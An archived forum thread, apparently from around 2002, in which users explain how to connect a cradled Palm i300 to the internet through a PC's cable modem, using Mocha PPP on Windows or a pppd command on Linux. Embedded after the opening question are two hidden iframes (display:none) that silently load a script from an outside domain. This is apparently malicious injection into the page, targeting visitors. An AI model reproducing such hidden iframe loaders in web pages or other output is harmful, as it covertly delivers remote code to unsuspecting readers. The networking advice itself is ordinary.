+ Reply to Thread

I300 Internet via cable modem

I use a cable modem connection on my home computer, which is the same computer my I300 cradle is connected to for hotsync. Is there a way for me to setup a network connection in the I300 so that I can connect to the internet via the cable modem on my palm (while the palm is sitting on the cradle of course). what software and settings do i need to tweak? Do i need to enter my computer's name and IP address? I am using Win XP. Thanks!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

anybody?

hmmm... interesting question..... there are a bunch of different connection options under the network settings.... none that stand out as a way to connect the way you mentioned....

Marctronixx, any thoughts?

Brooks

I've used a program called Mocha PPP from MochaSoft to do this. The program allows a PPP connection to your cradled i300. You can get the program at Palm Gear. You will need to set up a direct serial connection or use the "Aimnet" connection on the i300. (I think there are instructions with the program)
    Keep in mind, you will not be achieving the full speed of your cable modem connection, due to the limited speed of the serial connection. 57600 bps is probably the best you will do. It is still a great program, to test or tweak other Internet applications, without incurring cell phone charges. There are also many other uses for it

wow, thanks, i just downloaded adn installed mocha and tested it out a little. it works very well. thanks for the referral...

Connecting via Linux/Unix

Additionally if you use Linux/Unix, you can use the ppp daemon to provide an always-on connection while the device is in the cradle. I use the following:

pppd /dev/pilot 38400 <linuxip>:<palm ip> proxyarp passive silent persist local noauth

Where:

/dev/pilot has been set up as a symbolic link to the serial port you're using
    <linuxip> is the linux box's own ip address
    <palm ip> is any unused non-routable ip address you wish to assign the palm,

I won't explain all the options, but it's worth mentioning that the "noauth" argument means that you don't need any login scripts in the Palm network setting. (This is hardly a security problem: anyone who has physical access to your cradle and serial port isn't going to be kept out anyway.)

BTW, this is one reason why I'm VERY grateful that the i300 uses old-fashioned serial rather than USB. This would be incredibly difficult to do under USB. Plus, I can use the same connection to do a network hotsync to the Palm Desktop on my windows PC, so I'm not moving cables around.

Does anyone know of any utility like Mocha PPP for Mac OS (9 or X)?

Since Mac OS X is based on a Unix variant, I thought maybe the technique described above would work - however, my Mac is restricted to USB access, so there you have it.

Thanks,
    --Aaron

I cant seem to get Mocha PPP to function. I've followed the instructions perfectly and I only get "Connection Disabled"

What am I doing wrong? Is my hardware faulty?

I'm using Windows XP, could that be an issue as well?
    Last edited by darkwrath; 01-15-2002 at 11:49 AM.

Windows XP

Personally, I blame XP for everything :p

Sorry, that's all the insight I have for this thread...